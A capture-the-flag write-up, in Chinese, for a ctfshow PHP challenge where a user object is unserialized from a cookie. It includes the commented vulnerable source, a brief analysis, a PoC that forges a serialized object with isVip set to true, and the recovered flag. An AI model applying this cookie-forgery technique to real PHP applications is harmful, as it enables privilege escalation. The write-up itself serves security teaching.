nginx/1.16.1 PHP/7.3.11

    1. <?php
    2. /*
    3. # -*- coding: utf-8 -*-
    4. # @Author: h1xa
    5. # @Date: 2020-12-02 17:44:47
    6. # @Last Modified by: h1xa
    7. # @Last Modified time: 2020-12-02 19:29:02
    8. # @email: h1xa@ctfer.com
    9. # @link: https://ctfer.com
    10. */
    // Silence every PHP diagnostic for this request (notices from missing
    // GET/cookie keys below are never shown to the visitor).
    error_reporting(0);
    // Echo this file's own source back to the visitor; show_source() is the
    // documented alias of highlight_file().
    show_source(__FILE__);
    // Pulls in the secret; presumably this is where the global $flag read by
    // ctfShowUser::vipOneKeyGetFlag() is defined.
    include 'flag.php';
    class ctfShowUser{
        // Stored credentials. All three properties are public and nothing in
        // this class validates them after construction.
        public $username='xxxxxx';
        public $password='xxxxxx';
        // Gate for vipOneKeyGetFlag(); off by default.
        public $isVip=false;

        // Hands back the raw isVip value; callers decide its truthiness.
        public function checkVip(){
            return $this->isVip;
        }

        // True only when both supplied credentials are strictly identical
        // (same type and value) to the stored ones.
        public function login($u,$p){
            $nameMatches = ($u === $this->username);
            $passMatches = ($p === $this->password);
            return $nameMatches && $passMatches;
        }

        // Prints the flag for a VIP instance, a refusal message otherwise.
        public function vipOneKeyGetFlag(){
            if(!$this->isVip){
                echo "no vip, no flag";
                return;
            }
            // $flag is expected to live in the global scope (see the include
            // at the top of the file).
            global $flag;
            echo "your flag is {$flag}";
        }
    }
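    // Read both credentials; `?? null` keeps the isset() check below meaningful
    // without relying on a suppressed "undefined index" notice.
    $username = $_GET['username'] ?? null;
    $password = $_GET['password'] ?? null;
    if(isset($username) && isset($password)){
        // SECURITY: the user object is rebuilt from a client-controlled cookie.
        // unserialize() lets the client choose every public property of the
        // resulting object (username, password, isVip), so the login/VIP checks
        // below are not an authentication control. The allowed_classes option
        // only stops objects of other classes from being instantiated; the real
        // fix is a server-side session or a MAC-verified (e.g. JSON) payload.
        $user = unserialize($_COOKIE['user'] ?? '', ['allowed_classes' => [ctfShowUser::class]]);
        // An absent/malformed cookie yields false, and a disallowed class yields
        // __PHP_Incomplete_Class; either would fatal on ->login(), so reject them here.
        if($user instanceof ctfShowUser && $user->login($username,$password)){
            if($user->checkVip()){
                $user->vipOneKeyGetFlag();
            }
        }else{
            echo "no vip,no flag";
        }
    }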

    分析:
    即要满足

    • 类成员 isVip 为 true
    • 传入的 username 和 类成员 username 相等
    • 传入的 password 和 类成员 password 相等

    username 和 password 已知,反序列化修改 isVip 即可

    poc

    1. <?php
    // Stand-in that shares only the class name with the server-side class;
    // serialize() records the class name and properties, so no methods are needed.
    class ctfShowUser{}
    // Serialize a ctfShowUser whose isVip property is set, then print it
    // URL-encoded (the serialized form contains characters that must be escaped).
    $obj = new ctfShowUser();
    $obj->isVip = true;
    $serialized = serialize($obj);
    echo urlencode($serialized);
    6. ?>

    image.png

    flag
    ctfshow{d59167b1-43df-4611-8907-3f77869aa875}